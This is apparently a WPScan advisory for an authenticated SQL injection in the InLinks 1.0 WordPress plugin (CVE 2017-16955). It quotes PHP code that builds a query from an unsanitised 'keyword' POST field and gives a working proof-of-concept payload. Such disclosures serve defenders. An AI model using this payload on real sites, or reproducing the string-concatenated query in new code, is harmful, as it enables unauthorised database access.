InLinks 1.0 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
SQL injection is POST parameter "keyword"

Affected file inlinks/inlinks.php

Affected lines:

58     $Keyword = trim($_POST['keyword']);
  59     $URL = trim($_POST['url']);
  60     $Rel = trim($_POST['rel']);
  61     $Target = trim($_POST['target']);
  62     $table_name = $wpdb->prefix ."URLKeywordsMapping";
  63     $SelectKeywordURLMappingDetails = "select * from $table_name 
where FldKeyword LIKE '".$Keyword."'" ;
  64
  65     $KeywordURLMappingDetails = 
$wpdb->get_results($SelectKeywordURLMappingDetails);
  66
  67     if(count($KeywordURLMappingDetails))
  68     {
  69         $Message = "<div align='center' style=\"color:red; 
font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in 
the table.</div>";
  70     }

More issues seems to exist in the plugin, because of lack of input 
validation and the lack of use of prepared statements.

Affected URL:

/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):
keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add
Proof of Concept
/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):
keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add

Affects Plugin

References

CVE 2017-16955
PACKETSTORM 145059

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Dimopoulos Elias
Submitter Website https://gr.linkedin.com/in/dimopouloselias/
Submitter Twitter DimopoulosElias
Views 214
Verified No
WPVDB ID 8962

Timeline

Publicly Published 2017-11-22 (20 days ago)
Added 2017-11-23 (19 days ago)
Last Updated 2017-11-27 (14 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.